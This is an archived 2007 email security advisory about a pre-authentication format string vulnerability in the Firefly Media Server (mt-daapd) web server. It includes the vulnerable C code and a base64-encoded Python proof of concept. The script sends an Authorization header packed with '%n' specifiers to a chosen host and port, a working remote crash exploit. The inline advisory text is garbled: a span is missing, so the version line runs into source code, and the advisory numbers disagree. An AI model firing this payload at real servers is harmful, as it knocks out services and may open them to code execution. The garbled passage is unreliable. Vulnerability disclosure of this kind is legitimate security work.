[UPH-07-03] Firefly Media Server remote format string vulnerabil
------=_Part_3580_25399703.1194026412591
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[UPH-07-02]
UnprotectedHex.com security advisory [07-02]
Discovered by nnp
Discovered : 1 August 2007
Reported to the vendor : 13 October 2007
Fixed by vendor : 21 October 2007
Vulnerability class : Remote format string
Affected product : mt-dappd/Firefly Media Server
Version : request_vars,"HTTP_USER",username);
ws_addarg(&pwsc->request_vars,"HTTP_PASSWD",password);
int ws_addarg(ARGLIST *root, char *key, char *fmt, ...) {
....
va_start(ap,fmt);
vsnprintf(value,sizeof(value),fmt,ap);
va_end(ap);
Proof of concept code : Yes
- --
http://www.smashthestack.org
http://www.unprotectedhex.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (Darwin)
Comment: http://firegpg.tuxfamily.org
iD8DBQFHK8b8bP10WPHfgnQRAoYPAKCfzLo5QPxDKBbOI8Hl+hTnKS5OWACgoOmq
CM98n8wCZ3AVdi2/vVPhnzk=
=lrAq
-----END PGP SIGNATURE-----
------=_Part_3580_25399703.1194026412591
Content-Type: application/octet-stream; name=uph0703.py
Content-Transfer-Encoding: base64
X-Attachment-Id: f_f8jfal5n
Content-Disposition: attachment; filename=uph0703.py
IyFDOlxweXRob24yNVxweXRob24yNS5leGUNCg0KIiIiCkFkdmlzb3J5IDogW1VQSC0wNy0wM10N
Cm10LWRhcHBkL0ZpcmVmbHkgbWVkaWEgc2VydmVyIHJlbW90ZSBmb3JtYXQgc3RyaW5nIHZ1bG5l
cmFiaWxpdHkKRGlzY292ZXJlZCBieSBubnAKaHR0cDovL3d3dy51bnByb3RlY3RlZGhleC5jb20N
CiIiIg0KDQppbXBvcnQgc3lzDQppbXBvcnQgc29ja2V0DQppbXBvcnQgYmFzZTY0DQoNCmlmIGxl
bihzeXMuYXJndikgIT0gMzoNCiAgICBzeXMuZXhpdCgtMSkNCg0KZm10X3N0ciA9IGJhc2U2NC5i
NjRlbmNvZGUoIiVuIioxNiArICI6IiArICJwYXNzd29yZCIpDQpraWxsX21zZyA9ICJHRVQgL3ht
bC1ycGM/bWV0aG9kPXN0YXRzIEhUVFAvMS4xXHJcbkF1dGhvcml6YXRpb246IEJhc2ljICIgXA0K
ICAgICAgICAgICArIGZtdF9zdHIgKyAiXHJcblxyXG4iDQoNCmhvc3QgPSBzeXMuYXJndlsxXQ0K
cG9ydCA9IHN5cy5hcmd2WzJdDQoNCnByaW50ICdbK10gSG9zdCA6ICcgKyBob3N0DQpwcmludCAn
WytdIFBvcnQgOiAnICsgcG9ydA0KDQpwcmludCAiWytdIFNlbmRpbmcgIg0KcHJpbnQga2lsbF9t
c2cNCg0KcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVB
TSkNCnMuY29ubmVjdCgoaG9zdCwgaW50KHBvcnQpKSkNCnMuc2VuZChraWxsX21zZykNCnMuY2xv
c2UoKQ0KICAgIA0KDQo=
------=_Part_3580_25399703.1194026412591
Content-Type: text/plain; name=uph0703.txt
Content-Transfer-Encoding: base64
X-Attachment-Id: f_f8jfavyc
Content-Disposition: attachment; filename=uph0703.txt
W1VQSC0wNy0wMl0KVW5wcm90ZWN0ZWRIZXguY29tIHNlY3VyaXR5IGFkdmlzb3J5IFswNy0wMl0K
RGlzY292ZXJlZCBieSBubnAKCkRpc2NvdmVyZWQgOiAxIEF1Z3VzdCAyMDA3ClJlcG9ydGVkIHRv
IHRoZSB2ZW5kb3IgOiAxMyBPY3RvYmVyIDIwMDcKRml4ZWQgYnkgdmVuZG9yIDogMjEgT2N0b2Jl
ciAyMDA3CgpWdWxuZXJhYmlsaXR5IGNsYXNzIDogUmVtb3RlIGZvcm1hdCBzdHJpbmcKCkFmZmVj
dGVkIHByb2R1Y3QgOiBtdC1kYXBwZC9GaXJlZmx5IE1lZGlhIFNlcnZlcgpWZXJzaW9uIDogPD0g
MC4yLjQNClByb2R1Y3QgZGV0YWlsczogCnd3dy5maXJlZmx5bWVkaWFzZXJ2ZXIub3JnLyAKJycn
ClRoZSBwdXJwb3NlIG9mIHRoaXMgcHJvamVjdCBpcyBidWlsdCB0aGUgYmVzdCBzZXJ2ZXIgc29m
dHdhcmUgdG8gc2VydmUgZGlnaXRhbCBtdXNpYyB0byB0aGUgUm9rdSBTb3VuZGJyaWRnZSBhbmQg
aVR1bmVzOyB0byBiZSBhYmxlIHRvIHNlcnZlIHRoZSB3aWRlc3QgdmFyaWV0eSBvZiBkaWdpdGFs
IG11c2ljIGNvbnRlbnQgb3ZlciB0aGUgd2lkZXN0IHJhbmdlIG9mIGRldmljZXMKJycnDQoNCkZp
bGUvRnVuY3Rpb24vbGluZSA6IHdlYnNlcnZlci5jL3dzX2Rpc3BhdGNoZXIsd3NfYWRkYXJnLzkx
Ni05MjAsMTE3MQ0KDQpDYXVzZTogVGhpcyBpcyBhIHZzbnByaW50ZigpIHJlbGF0ZWQgZm9ybWF0
IHN0cmluZyBidWcuIFRoZSB3c19hZGRhcmcgZnVuY3Rpb24gdXNlcyBpdHMgdGhpcmQgYXJndW1l
bnQgYXMgdGhlIGZvcm1hdCBzcGVjaWZpZXIgYW5kIGluIHRoaXMgY2FzZSB0aGlzIGlzIHVzZXIg
Y29udHJvbGxlZCBhcyBpdCBpcyB0aGUgZGVjb2RlZCB1c2VybmFtZSBmcm9tIHRoZSBBdXRob3Jp
emF0aW9uIGZpZWxkIG9mIHRoZSByZXF1ZXN0IGhlYWRlci4gVGhlIGNhbGwgdG8gd3NfYWRkYXJn
IHRha2VzIHBsYWNlIHByZSBhdXRoIHNvIGFueSBmb3JtYXQgc3RyaW5nIHNob3VsZCBiZSBwb3Nz
aWJsZS4gVGhlcmUgaXMgbm8gcmVzdHJpY3Rpb24gb24gdGhlIGxlbmd0aCBvZiB0aGUgZm9ybWF0
IHN0cmluZyBlaXRoZXIuIFRoZSBwYXNzd29yZCBmaWVsZCB3b3VsZCBhbHNvIHN1ZmZpY2UgYXMg
YSBsb2NhdGlvbiBmb3IgdGhlIGZtdCBzdHJpbmcuIFRoaXMgdnVsbmVyYWJpbGl0eSBjb3VsZCBi
ZSB1c2VkIHRvIGV4ZWN1dGUgYXJiaXRyYXJ5IGNvZGUgb24gdGhlIGFmZmVjdGVkIHN5c3RlbS4K
CiAgICB3c19kZWNvZGVwYXNzd29yZChhdXRoLCZ1c2VybmFtZSwmcGFzc3dvcmQpOwogICAgaWYo
YXV0aF9oYW5kbGVyKHVzZXJuYW1lLHBhc3N3b3JkKSkKICAgICAgICBjYW5fZGlzcGF0Y2g9MTsK
ICAgIHdzX2FkZGFyZygmcHdzYy0+cmVxdWVzdF92YXJzLCJIVFRQX1VTRVIiLHVzZXJuYW1lKTsK
ICAgIHdzX2FkZGFyZygmcHdzYy0+cmVxdWVzdF92YXJzLCJIVFRQX1BBU1NXRCIscGFzc3dvcmQp
Ow0KCmludCB3c19hZGRhcmcoQVJHTElTVCAqcm9vdCwgY2hhciAqa2V5LCBjaGFyICpmbXQsIC4u
LikgewouLi4KICAgIHZhX3N0YXJ0KGFwLGZtdCk7CiAgICB2c25wcmludGYodmFsdWUsc2l6ZW9m
KHZhbHVlKSxmbXQsYXApOwogICAgdmFfZW5kKGFwKTsNCg0KUHJvb2Ygb2YgY29uY2VwdCBjb2Rl
IDogWWVzCg==
------=_Part_3580_25399703.1194026412591--